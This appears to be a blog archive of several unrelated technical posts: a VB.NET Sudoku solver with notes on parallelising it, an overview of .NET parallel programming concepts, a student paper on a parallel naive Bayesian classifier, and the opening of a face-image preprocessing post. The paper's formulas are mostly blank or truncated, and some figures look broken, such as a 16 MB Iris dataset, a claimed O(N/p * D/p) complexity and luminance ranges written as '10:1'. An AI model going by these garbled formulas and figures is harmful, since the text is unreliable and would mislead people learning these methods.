Below is the main method that we need to call to solve the puzzle which in turn utilizes strategies in all the methods described earlier..

<pre>

Public Function SolveLogical() As Boolean

Dim changes As Boolean = False

Do

changes = SetPossibleValues()

If Not changes Then

While SetTripletsRegion()

If IsSolution() Then Return True

changes = True

End While

If Not changes Then

While SetTripletsRow()

If IsSolution() Then Return True

changes = True

End While

If Not changes Then

While SetTripletsColumn()

If IsSolution() Then Return True

changes = True

End While

If Not changes Then

While SetTwinsRegion()

If IsSolution() Then Return True

changes = True

End While

If Not changes Then

While SetTwinsRow()

If IsSolution() Then Return True

changes = True

End While

If Not changes Then

While SetTwinsColumn()

If IsSolution() Then Return True

changes = True

End While

If Not changes Then

While SetLoneRangersRegion(HintOnly)

If IsSolution() Then Return True

changes = True

End While

If Not changes Then

While SetLoneRangersRow(HintOnly)

If IsSolution() Then Return True

changes = True

End While

If Not changes Then

While SetLoneRangersColumn(HintOnly)

If IsSolution() Then Return True

changes = True

End While

End If

End If

End If

End If

End If

End If

End If

End If

End If

Loop Until IsSolution() OrElse Not changes

Return changes

End Function

</pre>

Going Parallel

In this section, I will describe how to parallelize the elimination method. However, it seems that parallelizing any of these methods including finding lone rangers, twins and triplets. These efforts do not yield good scaling over manycore because even though the degree of parallelism is well achieved, the amount of work being done in parallel is small compared to the overall algorithm that is calling on to these methods which is still sequential in nature. That’s why a cleverer algorithm that is able to deal with concurrency needs to be developed later.

Anyway let’s take a look again at the GetCellPossibleValues. The method, performs 2 actions in sequence, these are:

1.  Find possible values using row and column scan

2.  Find possible values using minigrid scan

<pre>

Public Function GetCellPossibleValues(ByVal XIndex As Byte, ByVal YIndex As Byte) As List(Of Byte)

Dim c As New Cell

c.PossibleValues.Clear()

For Each b As Byte In mCells(XIndex, YIndex).PossibleValues

c.PossibleValues.Add(b)

Next

For i As Byte = 0 To 8

If Not mCells(i, YIndex).Type = Cell.CellType.Empty AndAlso i <> XIndex AndAlso mCells(XIndex, YIndex).PossibleValues.Contains(mCells(i, YIndex).Value) Then

c.PossibleValues.Remove(mCells(i, YIndex).Value)

End If

If Not mCells(XIndex, i).Type = Cell.CellType.Empty AndAlso i <> YIndex AndAlso mCells(XIndex, YIndex).PossibleValues.Contains(mCells(XIndex, i).Value) Then

c.PossibleValues.Remove(mCells(XIndex, i).Value)

End If

Next

Dim regionX As Byte = Math.Ceiling((XIndex + 1) / 3 – 1) * 3

Dim regionY As Byte = Math.Ceiling((YIndex + 1) / 3 – 1) * 3

For i As Byte = regionX To regionX + 2

For j As Byte = regionY To regionY + 2

If Not mCells(i, j).Type = Cell.CellType.Empty AndAlso i <> XIndex AndAlso j <> YIndex AndAlso mCells(XIndex, YIndex).PossibleValues.Contains(mCells(i, j).Value) Then

c.PossibleValues.Remove(mCells(i, j).Value)

End If

Next

Next

Return c.PossibleValues

End Function

</pre>

These 2 code blocks can be easily set to run in parallel at the same time because they are not dependant on each other. However, a lock needs to be set on the possible values of the cell since two or more threads might want to update the values at the same time. However, it is possible that the lock may not be needed because it doesn’t matter if one thread updates another thread’s value since the only action taken by any of the threads is to remove an element from the list. Therefore, if a thread is removing an element by setting its value to null and another thread came in to set the same elements value to null, it doesn’t matter which thread updates the other. The value will be null afterall. This is my own theory and I still need to test if I’m imagining it right J



Parallel Programming Concepts in .Net Framework

The .NET Framework stack

Image via Wikipedia

Contents

  1. Working With Shared-Memory Multicore.
  2. Shared-Memory and Distributed-Memory Systems.
  3. Parallel Programming and Multicore Programming.
  4. Hardware Threads and Software Threads.
  5. Amdahl’s Law.
  6. Gustafson’s Law.
  7. Working with Lightweight Concurrency.
  8. Creating Successful Task-Based Designs.
  9. Designing With Concurrency in Mind.
  10. Interleaved Concurrency, Concurrency, and Parallelism.
  11. Minimizing Critical Sections.

Working With Shared-Memory Multicore

Most machines today have at least a dual-core processor. However, quad-core and octal-core processors, with four and eight cores, respectively, are quite popular on servers, advanced workstations, and even on high-end mobile computers. Modern processors offer new multicore architectures. Thus, it is very important to prepare the software designs and the code to exploit these architectures. The different kinds of applications generated with C# 2010 and .NET Framework 4 run on one or many CPUs. Each of these processors can have a different number of cores, capable of executing multiple instructions at the same time.

Multicore processor can be simply described as many interconnected processors in a single package. All the cores have access to the main memory, as illustrated in figure below. Thus, this architecture is known as shared-memory multicore. Sharing memory in this way can easily lead to a performance bottleneck.

Multicore processors have many different complex architectures, designed to offer more parallel-execution capabilities, improve overall throughput, and reduce potential bottlenecks. At the same time, multicore processors try to reduce power consumption and generate less heat. Therefore, many modern processors can increase or reduce the frequency for each core according to their workload, and they can even sleep cores when they are not in use. Windows 7 and Windows Server 2008 R2 support a new feature called Core Parking. When many cores aren’t in use and this feature is active, these operating systems put the remaining cores to sleep. When these cores are necessary, the operating systems wake the sleeping cores.

Modern processors work with dynamic frequencies for each of their cores. Because the cores don’t work with a fixed frequency, it is difficult to predict the performance for a sequence of instructions.

For example, Intel Turbo Boost Technology increases the frequency of the active cores. The process of increasing the frequency for a core is also known as overclocking.

If a single core is under a heavy workload, this technology will allow it to run at higher frequencies when the other cores are idle. If many cores are under heavy workloads, they will run at higher frequencies but not as high as the one achieved by the single core. The processor cannot keep all the cores overclocked for a long time, because it consumes more power and its temperature increases faster. The average clock frequency for all the cores under heavy workloads is going to be lower than the one achieved for the single core. Therefore, under certain situations, some code can run at higher frequencies than other code, which can make measuring real performance gains a challenge.

Shared-Memory and Distributed-Memory Systems

Distributed-memory computer systems are composed of many processors with their own private memory, as illustrated in the below figure. Each processor can be in a different computer, with different types of communication channels between them. Examples of communication channels are wired and wireless networks. If a job running in one of the processors requires remote data, it has to communicate with the corresponding remote microprocessor through the communication channel. One of the most popular communications protocols used to program parallel applications to run on distributed-memory computer systems is Message Passing Interface (MPI). It is possible to use MPI to take advantage of shared-memory multicore with C# and .NET Framework. However, MPI’s main focus is to help developing applications run on clusters. Thus, it adds a big overhead that isn’t necessary in shared-memory multicore, where all the cores can access the memory without the need to send messages.

The figure below shows a distributed-memory computer system with three machines. Each machine has a quad-core processor, and shared-memory architecture for these cores. This way, the private memory for each microprocessor acts as a shared memory for its four cores. A distributed-memory system forces you to think about the distribution of the data, because each message to retrieve remote data can introduce an important latency. Because you can add new machines (nodes) to increase the number of processors for the system, distributed-memory systems can offer great scalability.

Parallel Programming and Multicore Programming

Traditional sequential code, where instructions run one after the other, doesn’t take advantage of multiple cores because the serial instructions run on only one of the available cores. Sequential code written with C# or VB 2010 won’t take advantage of multiple cores if it doesn’t use the new features offered by .NET Framework 4 to split the work into many cores. There isnt an automatic parallelization of existing sequential code.

Parallel programming is a form of programming in which the code takes advantage of the parallel execution possibilities offered by the underlying hardware. Parallel programming runs many instructions at the same time.

Multicore programming is a form of programming in which the code takes advantage of the multiple execution cores to run many instructions in parallel. Multicore and multiprocessor computers offer more than one processing core in a single machine. Hence, the goal is to “do more with less” meaning that the goal is to do more work in less time by distributing the work to be done in the available cores.

Modern microprocessors can also execute the same instruction on multiple data, a technique known as Single Instruction, Multiple Data or SIMD. This way, you can take advantage of these vector processors to reduce the time needed to execute certain algorithms.

Hardware Threads and Software Threads

A multicore processor has more than one physical core. A physical core is a real independent processing unit that makes it possible to run multiple instructions at the same time, in parallel. In order to take advantage of multiple physical cores, it is necessary to run many processes or to run more than one thread in a single process, creating multithreaded code. However, each physical core can offer more than one hardware thread, also known as a logical core or logical processor. Microprocessors with Intel Hyper-Threading Technology (HT or HTT) offer many architectural states per physical core. For example, many processors with four physical cores with HT duplicate the architectural states per physical core and offer eight hardware threads. This technique is known as simultaneous multithreading (SMT) and it uses the additional architectural states to optimize and increase the parallel execution at the microprocessor’s instruction level. SMT isn’t restricted to just two hardware threads per physical core; for example, you could have four hardware threads per core. This doesn’t mean that each hardware thread represents a physical core. SMT can offer performance improvements for multithreaded code under certain scenarios.

Each running program in Windows is a process. Each process creates and runs one or more threads, known as software threads to differentiate them from the previously explained hardware threads.

A process has at least one thread, the main thread. An operating system scheduler shares out the available processing resources fairly between all the processes and threads it has to run. Windows scheduler assigns processing time to each software thread. When Windows scheduler runs on a multicore processor, it has to assign time from a hardware thread, supported by a physical core, to each software thread that needs to run instructions. As an analogy, you can think of each hardware thread as a swim lane and a software thread as a swimmer.

Windows recognizes each hardware thread as a schedulable logical processor. Each logical processor can run code for a software thread. A process that runs code in multiple software threads can take advantage of hardware threads and physical cores to run instructions in parallel. The figure below shows software threads running on hardware threads and on physical cores. Windows scheduler can decide to reassign one software thread to another hardware thread to load-balance the work done by each hardware thread.

Because there are usually many other software threads waiting for processing time, load balancing will make it possible for these other threads to run their instructions by organizing the available resources. The figure below shows Windows Task Manager displaying eight hardware threads (logical cores and their workloads). Load balancing refers to the practice of distributing work from software threads among hardware threads so that the workload is fairly shared across all the hardware threads. However, achieving perfect load balance depends on the parallelism within the application, the workload, the number of software threads, the available hardware threads, and the load-balancing policy.

Windows runs hundreds of software threads by assigning chunks of processing time to each available hardware thread. You can use Windows Resource Monitor to view the number of software threads for a specific process in the Overview tab. The CPU panel displays the image name for each process and the number of associated software threads in the Threads column, as shown in the figure below where the vlc.exe process has 32 software threads.

Core Parking is a Windows kernel power manager and kernel scheduler technology designed to improve the energy efficiency of multicore systems. It constantly tracks the relative workloads of every hardware thread relative to all the others and can decide to put some of them into sleep mode. Core Parking dynamically scales the number of hardware threads that are in use based on workload. When the workload for one of the hardware threads is lower than a certain threshold value, the Core Parking algorithm will try to reduce the number of hardware threads that are in use by parking some of the hardware threads in the system. In order to make this algorithm efficient, the kernel scheduler gives preference to unparked hardware threads when it schedules software threads. The kernel scheduler will try to let the parked hardware threads become idle, and this will allow them to transition into a lower-power idle state.

Core Parking tries to intelligently schedule work between threads that are running on multiple hardware threads in the same physical core on systems with processors that include HT. This scheduling decision decreases power consumption. Windows Server 2008 R2 supports the complete Core Parking technology. However, Windows 7 also uses the Core Parking algorithm and infrastructure to balance processor performance between hardware threads with processors that include HT. The figure below shows Windows Resource Monitor displaying the activity of eight hardware threads, with four of them parked.

Regardless of the number of parked hardware threads, the number of hardware threads returned by

.NET Framework 4 functions will be the total number, not just the unparked ones. Core Parking technology doesn’t limit the number of hardware threads available to run software threads in a process. Under certain workloads, a system with eight hardware threads can turn itself into a system with two hardware threads when it is under a light workload, and then increase and spin up reserve hardware threads as needed. In some cases, Core Parking can introduce an additional latency to schedule many software threads that try to run code in parallel. Therefore, it is very important to consider the resultant latency when measuring the parallel performance.

Amdahl’s Law

If you want to take advantage of multiple cores to run more instructions in less time, it is necessary to split the code in parallel sequences. However, most algorithms need to run some sequential code to coordinate the parallel execution. For example, it is necessary to start many pieces in parallel and then collect their results. The code that splits the work in parallel and collects the results could be sequential code that doesn’t take advantage of parallelism. If you concatenate many algorithms like this, the overall percentage of sequential code could increase and the performance benefits achieved may decrease. Gene Amdahl, a renowned computer architect, made observations regarding the maximum performance improvement that can be expected from a computer system when only a fraction of the system is improved. He used these observations to define Amdahls Law, which consists of the following formula that tries to predict the theoretical maximum performance improvement (known as speedup) using multiple processors. It can also be applied with parallelized algorithms that are going to run with multicore microprocessors.

Maximum speedup (in times) = 1 / ((1 – P) + (P/N))

Where:

  • P is the portion of the code that runs completely in parallel.
  • N is the number of available execution units (processors or physical cores).

According to this formula, if you have an algorithm in which only 50 percent (P = 0.50) of its total work is executed in parallel, the maximum speedup will be 1.33x on a microprocessor with two physical cores. The figure below illustrates an algorithm with 1,000 units of work split into 500 units of sequential work and 500 units of parallelized work. If the sequential version takes 1,000 seconds to complete, the new version with some parallelized code will take no less than 750 seconds.

Maximum speedup (in times) = 1 / ((1 – 0.50) + (0.50 / 2)) = 1.33x

The maximum speedup for the same algorithm on a microprocessor with eight physical cores will be a really modest 1.77x. Therefore, the additional physical cores will make the code take no less than 562.5 seconds.

Maximum speedup (in times) = 1 / ((1 – 0.50) + (0.50 / 8)) = 1.77x

The figure below shows the maximum speedup for the algorithm according to the number of physical cores, from 1 to 16. As we can see, the speedup isn’t linear, and it wastes processing power as the number of cores increases.

The figure below shows the same information using a new version of the algorithm in which 90 percent (P = 0.90) of its total work is executed in parallel. In fact, 90 percent of parallelism is a great achievement, but it results in a 6.40x speedup on a microprocessor with 16 physical cores.

Maximum speedup (in times) = 1 / ((1 – 0.90) + (0.90 / 16)) = 6.40x

Gustafson’s Law

John Gustafson noticed that Amdahl’s Law viewed the algorithms as fixed, while considering the changes in the hardware that runs them. Thus, he suggested a reevaluation of this law in 1988. He considers that speedup should be measured by scaling the problem to the number of processors and not by fixing the problem size. When the parallel-processing possibilities offered by the hardware increase, the problem workload scales. Gustafsons Law provides the following formula with the focus on the problem size to measure the amount of work that can be performed in a fixed time:

Total work (in units) = S + (N × P)

Where:

  • S represents the units of work that run with a sequential execution.
  • P is the size of each unit of work that runs completely in parallel.
  • N is the number of available execution units (processors or physical cores).

You can consider a problem composed of 50 units of work with a sequential execution. The problem can also schedule parallel work in 50 units of work for each available core. If you have a processor with two physical cores, the maximum amount of work is going to be 150 units.

Total work (in units) = 50 + (2 × 50) = 150 units of work

The figure below illustrates an algorithm with 50 units of work with a sequential execution and a parallelized section. The latter scales according to the number of physical cores. This way, the parallelized section can process scalable, parallelizable 50 units of work. The workload in the parallelized section increases when more cores are available. The algorithm can process more data in less time if there are enough additional units of work to process in the parallelized section. The same algorithm can run on a processor with eight physical cores. In this case, it will be capable of processing 450 units of work in the same amount of time required for the previous case:

Total work (in units) = 50 + (8 × 50) = 450 units of work

The figure below shows the speedup for the algorithm according to the number of physical cores, from 1 to 16. This speedup is possible provided there are enough units of work to process in parallel when the number of cores increases. As you can see, the speedup is better than the results offered by applying Amdahl’s Law.

The figure below shows the total amount of work according to the number of available physical cores, from 1 to 32.

The figure below illustrates many algorithms composed of several units of work with a sequential execution and parallelized sections. The parallelized sections scale as the number of available cores increases. The impact of the sequential sections decreases as more scalable parallelized sections run units of work. In this case, it is necessary to calculate the total units of work for both the sequential and parallelized sections and then apply them to the formula to find out the total work with eight physical cores:

Total sequential work (in units) = 25 + 150 + 100 + 150 = 425 units of work

Total parallel unit of work (in units) = 50 + 200 + 300 = 550 units of work

Total work (in units) = 425 + (8 × 550) = 4,825 units of work

A sequential execution would be capable of executing only 975 units of work in the same amount of time:

Total work with a sequential execution (in units) =

25 + 50 + 150 + 200 + 100 + 300 + 150 = 975 units of work

Working with Lightweight Concurrency

Unfortunately, neither Amdahl’s Law nor Gustafson’s Law takes into account the overhead introduced by parallelism. Nor do they consider the existence of patterns that allow the transformation of sequential parts into new algorithms that can take advantage of parallelism. It is very important to reduce the sequential code that has to run in applications to improve the usage of the parallel execution units.

In previous .NET Framework versions, if you wanted to run code in parallel in a C# application you had to create and manage multiple threads (software threads). Therefore, you had to write complex multithreaded code. Splitting algorithms into multiple threads, coordinating the different units of code, sharing information between them, and collecting the results are indeed complex programming jobs. As the number of logical cores increases, it becomes even more complex, because you need more threads to achieve better scalability. The multithreading model wasn’t designed to help developers tackle the multicore revolution. In fact, creating a new thread requires a lot of processor instructions and can introduce a lot of overhead for each algorithm that has to be split into parallelized threads. Many of the most useful structures and classes were not designed to be accessed by different threads, and, therefore, a lot of code had to be added to make this possible. This additional code distracts the developer from the main goal: achieving a performance improvement through parallel execution.

Because this multithreading model is too complex to handle the multicore revolution, it is known as heavyweight concurrency. It adds an important overhead. It requires adding too many lines of code to handle potential problems because of its lack of support of multithreaded access at the framework level, and it makes the code complex to understand.

The aforementioned problems associated with the multithreading model offered by previous .NET

Framework versions and the increasing number of logical cores offered in modern processors motivated the creation of new models to allow creating parallelized sections of code. The new model is known as lightweight concurrency, because it reduces the overall overhead needed to create and execute code in different logical cores. It doesnt mean that it eliminates the overhead introduced by parallelism, but the model is prepared to work with modern multicore microprocessors. The heavyweight concurrency model was born in the multiprocessor era, when a computer could have many physical processors with one physical core in each. The lightweight concurrency model takes into account the new micro architectures in which many logical cores are supported by some physical cores. The lightweight concurrency model is not just about scheduling work in different logical cores. It also adds support of multithreaded access at the framework level, and it makes the code much simpler to understand. Most modern programming languages are moving to the lightweight concurrency model. Luckily, .NET Framework 4 is part of this transition. Thus, all the managed languages that can generate .NET applications can take advantage of the new model.

Creating Successful Task-Based Designs

Sometimes, you have to optimize an existing solution to take advantage of parallelism. In these cases, you have to understand an existing sequential design or a parallelized algorithm that offers a reduced scalability, and then you have to refactor it to achieve a performance improvement without introducing problems or generating different results. You can take a small part or the whole problem and create a task-based design, and then you can introduce parallelism. The same technique can be applied when you have to design a new solution. You can create successful task-based designs by following these steps:

  1. Split each problem into many subproblems and forget about sequential execution.
  2. Think about each subproblem as any of the following:
    1. Data that can be processed in parallel — Decompose data to achieve parallelism.
    2. Data flows that require many tasks and that could be processed with some kind of complex parallelism — Decompose data and tasks to achieve parallelism.
    3. Tasks that can run in parallel — decompose tasks to achieve parallelism.
    4. Organize your design to express parallelism.
    5. Determine the need for tasks to chain the different subproblems. Try to avoid dependencies as much as possible (minimizes locks).
    6. Design with concurrency and potential parallelism in mind.
    7. Analyze the execution plan for the parallelized problem considering current multicore microprocessors and future architectures. Prepare your design for higher scalability.
    8. Minimize critical sections as much as possible.
    9. Implement parallelism using task-based programming whenever possible.
    10. Tune and iterate.

The aforementioned steps don’t mean that all the subproblems are going to be parallelized tasks running in different threads. The design has to consider the possibility of parallelism and then, when it is time to code, you can decide the best option according to the performance and scalability goals. It is very important to think in parallel and split the work to be done into tasks. This way, you will be able to parallelize your code as needed. If you have a design prepared for a classic sequential execution, it is going to take a great effort to parallelize it by using task-based programming techniques.

Designing With Concurrency in Mind

When you design code to take advantage of multiple cores, it is very important to stop thinking that the code inside a C# application is running alone. C# is prepared for concurrent code, meaning that many pieces of code can run inside the same process simultaneously or with an interleaved execution. The same class method can be executed in concurrent code. If this method saves a state in a static variable and then uses this saved state later, many concurrent executions could yield unexpected and unpredictable results.

As previously explained, parallel programming for multicore microprocessors works with the shared-memory model. The data resides in the same shared memory, which could lead to unexpected results if the design doesn’t consider concurrency. It is a good practice to prepare each class and method to be able to run concurrently, without side effects. If you have classes, methods, or components that weren’t designed with concurrency in mind, you would have to test their designs before using them in parallelized code.

Each subproblem detected in the design process should be capable of running while the other subproblems are being executed concurrently. If you think that it is necessary to restrict concurrent code when a certain subproblem runs because it uses legacy classes, methods, or components, it should be made clear in the design documents. Once you begin working with parallelized code, it is very easy to incorporate other existing classes, methods, and components that create undesired side effects because they weren’t designed for concurrent execution.

Interleaved Concurrency, Concurrency, and Parallelism

The figure below illustrates the differences between interleaved concurrency and concurrency when there are two software threads and each one executes four instructions. The interleaved concurrency scenario executes one instruction for each thread, interleaving them, but the concurrency scenario runs two instructions in parallel, at the same time. The design has to be prepared for both scenarios.

Concurrency requires physically simultaneous processing to happen.

Parallelized code can run in many different concurrency and interleaved concurrency scenarios, even when it is executed in the same hardware configuration. Thus, one of the great challenges of a parallel design is to make sure that its execution with different possible valid orders and interleaves will lead to the correct result, otherwise known as correctness. If you need a specific order or certain parts of the code don’t have to run together, it is necessary to make sure that these parts don’t run concurrently. You cannot assume that they don’t run concurrently because you run it many times and it produces the expected results. When you design for concurrency and parallelism, you have to make sure that you consider correctness.

Minimizing Critical Sections

Both Amdahl’s Law and Gustafson’s Law recognized sequential work as an enemy of the overall performance in parallelized algorithms. The serial time between two parallelized sections that needs a sequential execution is known as a critical section. The figure below identifies four critical sections in one of the diagrams used to analyze Gustafson’s Law.

When you parallelize tasks, one of the most important goals in order to achieve the best performance is to minimize these critical sections. Most of the time, it is impossible to avoid some code that has to run with a sequential execution between two parallelized sections, because it is necessary to launch the parallel jobs and to collect results. However, optimizing the code in the critical sections and removing the unnecessary ones is even more important than the proper tuning of parallelized code.

When you face an execution plan with too many critical sections, remember Amdahl’s Law. If you cannot reduce them, try to find tasks that could run in parallel with the critical sections. For example, you can pre-fetch data that is going to be consumed by the next parallelized algorithm in parallel with a critical section to improve the overall performance offered by the solution. It is very important that you consider the capabilities offered by modern multicore hardware to avoid thinking you have just one single execution unit.

Parallel Naïve Bayesian Classifier

Conditional independence

Image via Wikipedia

Parallel Naïve Bayesian Classifier

 

Abstract

The Naïve Bayesian classifier is a simple probabilistic classifier algorithm based on the Bayes theorem. It is used in data mining for the classification of new input. Naive Bayes reduces a high-dimensional density estimation task to one dimensional density estimation by assuming class conditional independence [7]. Its assumption of independence among the variables of a given training set doesn’t deny the fact that it is comparable in performance to decision trees and neural networks because this assumption doesn’t greatly affect the posterior probabilities and the algorithm continues to work well [7]. In this paper a parallel approach for implementing the naïve Bayesian classifier is discussed and implemented. The parallel approach is done through the parallel integration of a set of classifiers into a single classifier [1]. Besides the parallel integration of a set of classifiers into one, the parallel approach also includes attribute parallelization where attributes can be assigned to different processors which allow the parallel computations of their probabilities. The parallel implementation of this algorithm is expected to improve the performance of the naïve Bayesian classifier and increase its accuracy.

 

Introduction

Naïve Bayesian classifier is a statistical classifier that classifies the class label of new entities based on the probabilities of variables given a class from training data. This algorithm assumes class conditional independence which means that the effect of an attribute value on a given class is independent of the values of the other attributes. The algorithm takes an input which has values for specified attributes and is required to identify the class of the input by computing the conditional probabilities of each class given this input and then choosing the largest conditional probability and denoting the input with the selected class. The algorithm is based on the Bayes theorem:

P(Ci|X)= P(X|Ci)*P(Ci)

P(X)

 

 

where X=<x1,…,xn> is an input for n attributes, each xi is an input value for the ith attribute and Ci is a class value for  supposing that there are m classes.

Since P(X) is constant for all classes only        P(X | Ci)*P(Ci) needs to be maximized.

The naïve Bayesian classifier proceeds as follows:

1-     Find the probabilities of all classes:

Pk =

Where , Pk is the probability of havingk, r is the total number of records, and rk is the number of records havingk

2-     For the given input X=<x1,…,xn> and class labels C=<C1,C2,C3,…,Cm> find P(Xi | Ck) for each given input value for a given attribute and for 1<= k <= m (all classes):

If the attribute is categorical value:

P (Xi | Ck) =

 

Where rik is the number of records havingk and the value Xi for the ith attribute.

If the attribute is continuous-valued, the attribute is typically assumed to have a Gaussian distribution with a mean µ and standard deviation s:

g(x,µ,σ)=

 

P(xk|Ci)=g(xk,µCiCi)

 

3-     For each class find the probability P(X|Ci) by applying the following formula for    :

P(X|Ci ) =  P(xk|Ci)

 

=  P(x1|Ci) * P(x2|Ci)*….*P(xn|Ci)

 

4-     In order to predict the class label of X, P(Ci|X) = P(X|Ci)*P(Ci) is evaluated for each class for  and then the class Cj having the highest P(Cj|X) is chosen to be the class of the given input.

 

In order to improve the performance of the naïve Bayesian classifier, the algorithm is implemented in parallel. Several parallel implementations exist including:

[1] The naïve Bayesian classifier is parallelized by first dividing the training set into k subsets and then applying this algorithm to each subset so that k classifiers are obtained. These classifiers are then integrated into a single classifier to find the decision rules [1]. In order to classify an unknown sample X, P (C i |X) is calculated for each class value:

Assign  X           Ci if

 

P(Ci|X)

 

=

 

For i=1,2,…,m; j=1,2,…k;

 

Where

 

wj =

 

In order to classify an unknown sample X, P(Ci | X) is calculated for all classes. The calculation of P(Ci|X) is shown in the above equation, where from each classifier P(X|Ci)*P(Ci) is calculated then its multiplied by an assigned weight for each classifier. These values are added then divided by the total number of classifiers which is k. This is how the classifiers are integrated. The weight of the classifier is calculated by first finding the error rate of the classifier, subtracting it from 1 then dividing it by

 

Where fj is the error rate for classifier Cj.

By using integration of multiple classifiers, the recognition error rate can be reduced and robust of classification can be improved. [3] Thus the research of integration of multiple classifiers becomes important. At present, recognition based on integration of multiple classifiers was applied in many fields, such as handwritten and text recognition [4], face recognition [5], time-series prediction [6], etc.

In effect, naïve Bayesian classification reduces a high-dimensional density estimation task to one-dimensional kernel density estimation [7], because by assuming variable independence, the conditional probabilities can be calculated separately for each variable. Furthermore, the assumption does not seem to greatly affect the posterior probabilities, especially in regions near decision boundaries, thus, leaving the classification task unaffected.

 

Proposed Method

The parallel implementation of naïve Bayesian classifier is done by dividing the attributes into p subsets, where p is the number of available processors. Each subset would contain n/p attributes, where n is the number of attributes.

These subsets are assigned to different processors and thus the calculation of the probabilities P(Xi|Cj) for each class can be found in parallel with other attributes probabilities. After finding all the conditional probabilities P(Xi|Cj) for all classes, the conditional probabilities that belong to the same class are multiplied in order to obtain P(Cj|X). Then we find the maximum P(Cj|X) and assign class Cj to input X.

The parallel algorithm is preceded by a pre-processing phase where the data list is organized into data structures where for each attribute a data structure is constructed containing the attribute name, its distinct values, and the class count for each class for each distinct value.

Implementation and Analysis

The parallel naïve Bayesian classifier is implemented as follows:

ClassifyInput (data)

{

Compute P(Cj) for all class values

Divide the attributes among different processors

For Each attribute processed in parallel

{

Compute P(Cj|Xi)=P(Xi|Cj)*P(Cj) for all classes

}

For Each class

{

multiply P(Cj|Xi) for all input

}

Choose the highest P(Cj|Xi) and label the input with Cj class

}

The implementation of the parallel naïve Bayesian classifier is shown in the above algorithm, where evaluation of the conditional probabilities P(Xi|Cj) is done in parallel, by distributing the attributes among different processors. After finding the conditional probabilities, the conditional probabilities that belong to the same class are multiplied and then the class having the maximum obtained probability is chosen as the class label for the input X. Record parallelization was also used for parallelizing naive Bayesian classifier by allowing the processors to participate in computing P(Cj|Xi) for each sing class by distributing the records of the database among them.

The implementation of parallel naive Bayesian classifier would significantly reduce the time complexity from O (ND) to O (N/p * D/p) where N is the number of training records and D is the number of attributes.

 

Experiments and Results

The goal of this experiment was to study the effects of parallelizing naive Bayesian classifier in order to speed up the learning process when large data sets are present for training the system. Iris database of size 16 MB was used to train the system which is “perhaps the best known database to be found in the pattern recognition literature” [8]. The data set contains three classes, where each class refers to a type of iris plant. Five attributes are present in this database which are Sepal Length, Sepal Width, Petal Length, Petal Width, and the class label attribute which can contain three values: “Iris-setosa”, “Iris-virginica” and “Iris-versicolour”.  These datasets were preprocessed before running the algorithm by building new data structures so that they can fit in memory. The experiment was implemented on two machines one having a single processor and the other having seven processors and the obtained results were compared. By applying the above mentioned parallel procedures, the obtained execution time which is 3.89 seconds was approximately the same as the execution time of the serial approach which is 4.542 seconds. Also the time complexity of the algorithm would be reduced from O (ND) to O (N/p * D/p) where N is the number of training records, D is the number of attributes and p is the number of available processors. In the time complexity, N was replaced by N/p and D was replaced by D/p because in the parallel naive Bayesian classifier, instead of processing N attributes and D records in a serial manner, these numbers can be divided among the p processors so that each processor can now process a subset of attributes of size N/p and a subset of records of size D/p in a parallel manner. The accuracy of the algorithm was also calculated by using the holdout method, where two third of the data was used for training the system and one third of the data was used for testing the system. The training and testing datasets were chosen randomly from the database and the accuracy was calculated. This process is repeated ten times and the obtained average accuracy of the parallel algorithm was 33%. The parallel implementation of this algorithm didn’t result in speeding up the naive Bayesian algorithm.

Conclusion

In this paper parallel naïve Bayesian classifier was implemented through a new approach that hasn’t been addressed before through attribute and record parallelization. The parallel implementation of this algorithm didn’t result in an important increase in the speed of the naïve Bayesian algorithm. The implementation of the ensemble method along with attribute and record parallelization are taken into consideration for future work.

References

[1] PENG-TAO JIA, HUA-CAN HE, WEI LIN

“DECISION BY MAXIMUM OF POSTERIOR PROBABILITY AVERAGE WITH WEIGHTS: A METHOD OF MULTIPLE CLASSIFIERS COMBINATION”

 

[2] J. Kittler, M. Hatef, Duin R. P. W., and J.          Matas, “On combining classifiers”, IEEE Transactions on Pattern  analysis and Machine Intelligence, Vol 20, No. 3, pp. 226-239, Mar. 1998.

 

[3] Duin R. P. W., and Tax D. M. J., “Experiments with Classifier Combining Rules”, presented at the 1st International Workshop on Multiple Classifier System, Cagliari, Italy, pp. 16-29, Jun. 2000.

 

[4] Xu L, Krzyzak A, and Suen C Y, “Methods for Combining Multiple Classifiers and Their Applications to Handwriting Recognition”, IEEE Transactions on Systems,Man,and Cybernetics, Vol 22, No. 3, pp. 418-435, May. 1992.

 

[5] Xiaoguang Lv, Yunhong Wang and AK Jain, “Combining Classifiers for Face Recognition”, presented at the IEEE International Conference on Multimedia &Exp, Jul. 2003.

 

[6] C. Dietrich, F. Schwenker, and G. Palm, “Classification of time series utilizing temporal and decision fusion”, Proceedings of Multiple Classifier Systems (MCS), Cambridge, pp. 378-387. Feb. 2001.

 

[7] Richard O. Duba, Peter E. Hart, and David G. Stork, Pattern Classification(2nd Edition), John Wiley & Sons, Inc., 2001.

 

[8]http://archive.ics.uci.edu/ml/machine- learning-databases/iris/iris.names

Face Recognition: Image Preprocessing

Red, green and blue lights showing secondary c...

Image via Wikipedia

1. Introduction

Human eyes have about 10:1 absolute range from fully adapted dark vision to fully adapted lighting conditions at noon on the equator. We can see about 3X10:1 range of luminance when we are adapted to a normal working range. Due to the limited dynamic ranges of current imaging and display devices, images captured in real world scenes with high dynamic ranges usually exhibit poor visibility of either over exposure or shadows and low contrast, which may make important image features lost or hard to tell by human eyes. Computer vision algorithms also have difficulty processing those images. To cope with this problem, various image processing techniques have been developed. Some of those techniques are spatially-independent methods, like gamma adjustment, logarithmic compression, histogram equalization (HE), and levels/curves methods.

Human face detection plays an important role in applications such as intelligent human computer interface (HCI), biometric identification, and face recognition. The goal of any face detection technique is to identify the face regions within a given image. The reliable detection of faces has been an ongoing research topic for decades. There are several face detection techniques proposed in the literature both in gray scale and color. The appearance based algorithms process gray scale images. A typical color based face detection system on the other hand would first do a skin color region extraction on color images based on either pixel based or a combination of pixels and shape based systems in different color spaces. The next step would in general be region merging followed by classification or application of any appearance-based method to classify the skin color regions into faces and non-faces by converting them into gray scale images.

 

2. Grayscale

In photography and computing, a grayscale or grayscale digital image is an image in which the value of each pixel is a single sample, that is, it carries only intensity information. Images of this sort, also known as black-and-white, are composed exclusively of shades of gray, varying from black at the weakest intensity to white at the strongest.

Grayscale images are distinct from one-bit black-and-white images, which in the context of computer imaging are images with only the two colors, black, and white (also called bi-level or binary images). Grayscale images have many shades of gray in between. Grayscale images are also called monochromatic, denoting the absence of any chromatic variation.

